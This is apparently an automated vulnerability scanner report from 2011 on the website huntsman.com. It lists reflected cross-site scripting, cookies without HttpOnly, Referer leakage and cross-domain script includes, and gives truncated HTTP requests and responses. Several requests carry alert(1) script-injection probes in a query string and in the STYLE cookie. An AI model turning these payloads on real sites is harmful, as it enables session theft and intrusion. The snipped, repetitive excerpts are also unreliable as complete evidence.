1. Cross-site scripting (reflected)
1.1. http://www.huntsman.com/ [name of an arbitrarily supplied request parameter]
1.2. http://www.huntsman.com/eng/News/News/index.cfm [PageID parameter]
1.5. http://www.huntsman.com/eng/News/News/index.cfm [STYLE cookie]
1.6. http://www.huntsman.com/eng/News/Points_of_contact/Contact_Huntsman_/index.cfm [STYLE cookie]
2. Cookie without HttpOnly flag set
3. Cross-domain Referer leakage
3.1. http://www.huntsman.com/eng/News/News/index.cfm
3.2. http://www.huntsman.com/eng/News/Points_of_contact/Contact_Huntsman_/index.cfm
4. Cross-domain script include
4.2. http://www.huntsman.com/eng/News/News/index.cfm
4.3. http://www.huntsman.com/eng/News/Points_of_contact/Contact_Huntsman_/index.cfm
Severity: | High |
Confidence: | Certain |
Host: | http://www.huntsman.com |
Path: | / |
GET /?163ec'-alert(1)- Host: www.huntsman.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Connection: close Date: Tue, 17 May 2011 13:49:38 GMT Server: Microsoft-IIS/6.0 Set-Cookie: CFID=27122366;expires=Thu Set-Cookie: CFTOKEN=71276179;expires Set-Cookie: LANGUAGE_CODE_85=ENG Set-Cookie: STYLE=;path=/ Content-Language: en-US Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><script type="text/j ...[SNIP]... <script language="JavaScript" type="text/javascript"> function printPage(){ if(window.print) window.open('http://www else alert('Sorry, your browser does not support the print feature.\nPlease click t ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.huntsman.com |
Path: | /eng/News/News/index.cfm |
GET /eng/News/News/index.cfm Host: www.huntsman.com Proxy-Connection: keep-alive Referer: http://www.huntsman.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=27122343; CFTOKEN=36535797; LANGUAGE_CODE_85=ENG; STYLE=; __utma=70795145.767609925 |
HTTP/1.1 200 OK Connection: close Date: Tue, 17 May 2011 13:53:03 GMT Server: Microsoft-IIS/6.0 Content-Language: en-US Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><script type="text/j ...[SNIP]... <script language="JavaScript" type="text/javascript"> function printPage(){ if(window.print) window.open('http://www else alert('Sorry, your browser does not support the print feature.\nPlease click the page with y ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.huntsman.com |
Path: | /eng/News/Points_of |
GET /eng/News/Points_of Host: www.huntsman.com Proxy-Connection: keep-alive Referer: http://www.huntsman.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=27122343; CFTOKEN=36535797; LANGUAGE_CODE_85=ENG; STYLE=; __utma=70795145.767609925 |
HTTP/1.1 200 OK Connection: close Date: Tue, 17 May 2011 13:50:30 GMT Server: Microsoft-IIS/6.0 Content-Language: en-US Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><script type="text/j ...[SNIP]... <script language="JavaScript" type="text/javascript"> function printPage(){ if(window.print) window.open('http://www else alert('Sorry, your browser does not support the print feature.\nPlease click the page with y ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.huntsman.com |
Path: | /eng/News/Points_of |
GET /eng/News/Points_of Host: www.huntsman.com Proxy-Connection: keep-alive Referer: http://www.huntsman.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=27122343; CFTOKEN=36535797; LANGUAGE_CODE_85=ENG; STYLE=; __utma=70795145.767609925 |
HTTP/1.1 200 OK Connection: close Date: Tue, 17 May 2011 13:52:29 GMT Server: Microsoft-IIS/6.0 Content-Language: en-US Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><script type="text/j ...[SNIP]... <script language="JavaScript" type="text/javascript"> function printPage(){ if(window.print) window.open('http://www else alert('Sorry, your browser does not support the print feature.\nPlease click the page with ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.huntsman.com |
Path: | /eng/News/News/index.cfm |
GET /eng/News/News/index.cfm Host: www.huntsman.com Proxy-Connection: keep-alive Referer: http://www.huntsman.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=27122343; CFTOKEN=36535797; LANGUAGE_CODE_85=ENG; STYLE=e6d10"><script>alert(1)< |
HTTP/1.1 200 OK Connection: close Date: Tue, 17 May 2011 14:03:11 GMT Server: Microsoft-IIS/6.0 Content-Language: en-US Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><script type="text/j ...[SNIP]... <link rel="STYLESHEET" type="text/css" href="http://www.huntsman ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.huntsman.com |
Path: | /eng/News/Points_of |
GET /eng/News/Points_of Host: www.huntsman.com Proxy-Connection: keep-alive Referer: http://www.huntsman.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=27122343; CFTOKEN=36535797; LANGUAGE_CODE_85=ENG; STYLE=f7095"><script>alert(1)< |
HTTP/1.1 200 OK Connection: close Date: Tue, 17 May 2011 13:51:36 GMT Server: Microsoft-IIS/6.0 Content-Language: en-US Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><script type="text/j ...[SNIP]... <link rel="STYLESHEET" type="text/css" href="http://www.huntsman ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://www.huntsman.com |
Path: | / |
GET / HTTP/1.1 Host: www.huntsman.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Connection: close Date: Tue, 17 May 2011 13:49:09 GMT Server: Microsoft-IIS/6.0 Set-Cookie: CFID=27122344;expires=Thu Set-Cookie: CFTOKEN=24111839;expires Set-Cookie: LANGUAGE_CODE_85=ENG Set-Cookie: STYLE=;path=/ Content-Language: en-US Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><script type="text/j ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.huntsman.com |
Path: | /eng/News/News/index.cfm |
GET /eng/News/News/index.cfm Host: www.huntsman.com Proxy-Connection: keep-alive Referer: http://www.huntsman.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=27122343; CFTOKEN=36535797; LANGUAGE_CODE_85=ENG; STYLE=; __utma=70795145.767609925 |
HTTP/1.1 200 OK Connection: close Date: Tue, 17 May 2011 13:49:53 GMT Server: Microsoft-IIS/6.0 Content-Language: en-US Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><script type="text/j ...[SNIP]... </span> <a href="https://www ...[SNIP]... </div> <script src="http://www.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.huntsman.com |
Path: | /eng/News/Points_of |
GET /eng/News/Points_of Host: www.huntsman.com Proxy-Connection: keep-alive Referer: http://www.huntsman.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=27122343; CFTOKEN=36535797; LANGUAGE_CODE_85=ENG; STYLE=; __utma=70795145.767609925 |
HTTP/1.1 200 OK Connection: close Date: Tue, 17 May 2011 13:49:48 GMT Server: Microsoft-IIS/6.0 Content-Language: en-US Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><script type="text/j ...[SNIP]... </span> <a href="https://www ...[SNIP]... </div> <script src="http://www.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.huntsman.com |
Path: | / |
GET / HTTP/1.1 Host: www.huntsman.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Connection: close Date: Tue, 17 May 2011 13:49:09 GMT Server: Microsoft-IIS/6.0 Set-Cookie: CFID=27122344;expires=Thu Set-Cookie: CFTOKEN=24111839;expires Set-Cookie: LANGUAGE_CODE_85=ENG Set-Cookie: STYLE=;path=/ Content-Language: en-US Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><script type="text/j ...[SNIP]... </div> <script src="http://www.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.huntsman.com |
Path: | /eng/News/News/index.cfm |
GET /eng/News/News/index.cfm Host: www.huntsman.com Proxy-Connection: keep-alive Referer: http://www.huntsman.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=27122343; CFTOKEN=36535797; LANGUAGE_CODE_85=ENG; STYLE=; __utma=70795145.767609925 |
HTTP/1.1 200 OK Connection: close Date: Tue, 17 May 2011 13:49:53 GMT Server: Microsoft-IIS/6.0 Content-Language: en-US Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><script type="text/j ...[SNIP]... </div> <script src="http://www.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.huntsman.com |
Path: | /eng/News/Points_of |
GET /eng/News/Points_of Host: www.huntsman.com Proxy-Connection: keep-alive Referer: http://www.huntsman.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=27122343; CFTOKEN=36535797; LANGUAGE_CODE_85=ENG; STYLE=; __utma=70795145.767609925 |
HTTP/1.1 200 OK Connection: close Date: Tue, 17 May 2011 13:49:48 GMT Server: Microsoft-IIS/6.0 Content-Language: en-US Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><script type="text/j ...[SNIP]... </div> <script src="http://www.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.huntsman.com |
Path: | /eng/News/Points_of |
GET /eng/News/Points_of Host: www.huntsman.com Proxy-Connection: keep-alive Referer: http://www.huntsman.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=27122343; CFTOKEN=36535797; LANGUAGE_CODE_85=ENG; STYLE=; __utma=70795145.767609925 |
HTTP/1.1 200 OK Connection: close Date: Tue, 17 May 2011 13:49:48 GMT Server: Microsoft-IIS/6.0 Content-Language: en-US Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><script type="text/j ...[SNIP]... <input type="hidden" name="mailto" value="gary_chapman@huntsman.com"> ...[SNIP]... |